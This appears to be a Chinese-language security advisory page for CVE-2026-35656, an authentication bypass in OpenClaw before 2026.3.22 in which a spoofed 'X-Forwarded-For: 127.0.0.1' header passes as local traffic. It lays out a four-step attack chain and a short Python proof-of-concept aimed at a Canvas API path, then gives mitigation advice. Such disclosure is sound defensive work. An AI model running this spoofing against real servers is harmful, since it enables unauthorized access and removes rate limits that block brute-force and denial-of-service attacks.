CVE-2026-35656 CVSS 6.5 中危

CVE-2026-35656 OpenClaw认证绕过漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35656

漏洞类型

认证绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.22 之前版本存在严重的安全缺陷，涉及认证绕过。当系统配置 trustedProxies 时，攻击者能够利用 X-Forwarded-For 头部处理逻辑的漏洞，伪造回环网络跳转。这使得攻击者可以伪装成本地客户端，成功绕过 Canvas 身份验证机制以及 API 速率限制保护，进而未授权访问系统内部功能。

技术细节

该漏洞的核心在于 OpenClaw 对 X-Forwarded-For 头部解析时的信任逻辑缺陷。当应用服务器位于反向代理之后并配置了 trustedProxies 时，它会依赖该头部来确定客户端的真实 IP。然而，OpenClaw 未充分验证该头部值的合法性，允许攻击者注入伪造的 IP 地址。通过将 X-Forwarded-For 设置为 127.0.0.1（本地回环地址），攻击者可以欺骗服务器认为请求源自受信任的本地接口。由于服务器通常对本地流量豁免认证检查并放行速率限制，这一逻辑缺陷导致攻击者能够直接绕过 Canvas 的身份验证流程，未授权访问敏感数据，或利用绕过的速率限制机制对服务发起暴力破解或 DoS 攻击。

攻击链分析

STEP 1

信息收集

攻击者识别出目标使用的是 OpenClaw 2026.3.22 之前的版本。

STEP 2

构造恶意请求

攻击者向目标服务器发送 HTTP 请求，并在头部中插入 'X-Forwarded-For: 127.0.0.1'，伪造源 IP 为本地回环地址。

STEP 3

欺骗信任机制

由于配置了 trustedProxies，OpenClaw 错误地信任了伪造的头部，认为请求来自受信任的本地回环接口。

STEP 4

绕过防护

服务器跳过身份验证和速率限制检查，允许攻击者访问受限的 Canvas 资源或无限制地调用 API。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_poc(target_url):
    headers = {
        "User-Agent": "Mozilla/5.0 (PoC Scanner)",
        "X-Forwarded-For": "127.0.0.1"
    }
    try:
        # Attempt to access a protected resource (e.g., Canvas API)
        response = requests.get(f"{target_url}/api/canvas/check", headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Potential Authentication Bypass detected via X-Forwarded-For spoofing.")
        else:
            print("[-] Exploit failed or patch applied.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    url = "http://target-openclaw-server"
    check_poc(url)

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应临时禁用 trustedProxies 功能或将其限制为特定的代理服务器 IP，并在外部网关处拦截包含 127.0.0.1 或其他内网地址的 X-Forwarded-For 请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表